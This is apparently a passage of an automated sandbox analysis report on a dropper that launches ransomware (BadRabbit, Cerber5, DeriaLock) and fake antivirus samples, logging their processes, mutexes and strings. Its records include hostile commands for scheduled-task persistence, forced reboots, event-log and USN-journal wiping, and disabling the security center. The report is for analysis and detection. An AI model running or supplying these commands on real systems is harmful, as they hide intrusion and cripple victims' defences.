          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@DeriaLock.exe "C:\Users\user\Desktop\Endermanch@DeriaLock.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeProcess created: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\antivirus-platinum.exe c:\windows\antivirus-platinum.exe
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe "C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h c:\windows\antivirus-platinum.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2633966292 && exit"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2633966292 && exit"
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe "C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:10:00
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall reset
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 2633966292 && exit
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\3F22.tmp "C:\Windows\3F22.tmp" \\.\pipe\{C1B24DF3-0828-43A8-B4E0-909C189DD6EB}
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:10:00
          Source: C:\Windows\3F22.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess created: C:\Users\user\AppData\Local\6AdwCleaner.exe "C:\Users\user\AppData\Local\6AdwCleaner.exe"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe "C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe "C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /y
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net start winmgmt
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4652 -ip 4652
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net start wscsvc
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop wscsvc
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\wbem\mofcomp.exe mofcomp C:\Users\user\AppData\Local\Temp\4otjesjty.mof
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\4d44bed6.exe "C:\Users\user\Desktop\4d44bed6.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@Antivirus.exe "C:\Users\user\Desktop\Endermanch@Antivirus.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe "C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe "C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe "C:\Users\user\Desktop\Endermanch@AnViPC2009.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@BadRabbit.exe "C:\Users\user\Desktop\Endermanch@BadRabbit.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@Birele.exe "C:\Users\user\Desktop\Endermanch@Birele.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@Cerber5.exe "C:\Users\user\Desktop\Endermanch@Cerber5.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@DeriaLock.exe "C:\Users\user\Desktop\Endermanch@DeriaLock.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe "C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe "C:\Users\user\Desktop\Endermanch@HappyAntivirus.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe "C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe "C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe" Jump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop winmgmt /yJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net start winmgmtJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net start wscsvcJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\wbem\mofcomp.exe mofcomp C:\Users\user\AppData\Local\Temp\4otjesjty.mofJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeProcess created: C:\Windows\302746537.exe "C:\WINDOWS\302746537.exe" Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeProcess created: unknown unknown
          Source: C:\Windows\302746537.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ECFB.tmp\302746537.bat" "
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeProcess created: C:\Program Files (x86)\antiviruspc2009\avpc2009.exe "C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\comctl32.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\mscomctl.ocx
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\antivirus-platinum.exe c:\windows\antivirus-platinum.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h c:\windows\antivirus-platinum.exe
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2633966292 && exit"
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:10:00
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\3F22.tmp "C:\Windows\3F22.tmp" \\.\pipe\{C1B24DF3-0828-43A8-B4E0-909C189DD6EB}
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall reset
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess created: C:\Users\user\AppData\Local\6AdwCleaner.exe "C:\Users\user\AppData\Local\6AdwCleaner.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2633966292 && exit"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:10:00
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop wscsvc
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4652 -ip 4652
          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
          Source: C:\Windows\SysWOW64\net.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_004034AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,5_2_004034AA
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 8_2_0040346B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,8_2_0040346B
          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;explorer.exe&quot;)
          Source: C:\Windows\SysWOW64\net1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;E&quot;)
          Source: C:\Windows\SysWOW64\wevtutil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;E&quot;)
          Source: C:\Windows\SysWOW64\wevtutil.exeWMI Queries: Provider::ExecQuery - CIMWin32 : select __RELPATH, __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId from Win32_Process where Caption = &quot;E&quot;
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeFile created: C:\Users\user\AppData\Local\Temp\4otjesjty.mofJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_0040A9BD OleInitialize,CoCreateInstance,MultiByteToWideChar,OleUninitialize,5_2_0040A9BD
          Source: 4d44bed6.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\4d44bed6.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:752:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1380:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeMutant created: \Sessions\1\BaseNamedObjects\6e722db8-b319-4933-9932-314a077920be
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9568:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5836:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9368:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9512:120:WilError_01
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeMutant created: \Sessions\1\BaseNamedObjects\shell.ipc.{A9BC41FB-D475-E289-F83B-1E63902FBB48}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9392:120:WilError_01
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeMutant created: \Sessions\1\BaseNamedObjects\avpc2009megamutex
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9456:120:WilError_01
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeMutant created: \Sessions\1\BaseNamedObjects\AntiVirus Pro 2017_MUTEX
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeMutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMFCEJFAAEGEBAAAA
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:9468:64:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5916:120:WilError_01
          Source: Yara matchFile source: 49.0.Endermanch@InternetSecurityGuard.exe.13140000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.534359527.0000000000401000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000031.00000000.521029306.0000000013141000.00000020.00000001.01000000.00000024.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exe, type: DROPPED
          Source: C:\Users\user\Desktop\4d44bed6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeWindow found: window name: msctls_updown32Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeAutomated click: OK
          Source: C:\Windows\antivirus-platinum.exeAutomated click: OK
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeWindow detected: Number of UI elements: 16
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeWindow detected: Number of UI elements: 51
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeWindow detected: Number of UI elements: 34
          Source: C:\Windows\SysWOW64\regsvr32.exeKey value created or modified: HKEY_CURRENT_USER\Control Panel\Mouse MouseHoverTime
          Source: C:\Users\user\Desktop\4d44bed6.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: 4d44bed6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 4d44bed6.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: e:\Working Copies\Bundles\Antivirus\Av\release\avt_main.pdb source: Endermanch@Antivirus.exe, 00000004.00000000.431489950.00000000004AE000.00000002.00000001.01000000.00000007.sdmp
          Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Endermanch@AntivirusPlatinum.exe, 00000005.00000000.437900629.0000000000412000.00000002.00000001.01000000.00000008.sdmp, Endermanch@AntivirusPlatinum.exe, 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmp, Endermanch@AnViPC2009.exe, 00000008.00000000.450117816.0000000000412000.00000002.00000001.01000000.0000000F.sdmp, Endermanch@AnViPC2009.exe, 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmp
          Source: Binary string: .cld.cfg.ign.ftm.wdb.gdb.pdb.rmd.zmd.sdb.ldu.ldb.ndu.ndb.mdu.mdb.fp.hdu.hdb.db3.db2.dbcli_tgzload: Can't fdopen() descriptor %d, errno = %d source: avpc2009.exe, 00000019.00000000.490943121.0000000000516000.00000002.00000001.01000000.0000001A.sdmp
          Source: Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 00000016.00000000.479926826.0000000000D62000.00000002.00000001.01000000.00000017.sdmp
          Source: Binary string: dcrypt.pdb source: rundll32.exe, 0000000F.00000002.554445419.000000000343C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.511029436.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.488118992.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.471920042.000000000343D000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeUnpacked PE file: 16.2.Endermanch@Cerber5.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeUnpacked PE file: 16.2.Endermanch@Cerber5.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_3_007BA559 push ss; retf 5_3_007BA55C
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_3_007BA559 push ss; retf 5_3_007BA55C
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_3_007BA55D push ss; iretd 5_3_007BA56C
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_3_007BA55D push ss; iretd 5_3_007BA56C
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_3_007BC532 push cs; iretd 5_3_007BC534
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_3_007BC532 push cs; iretd 5_3_007BC534
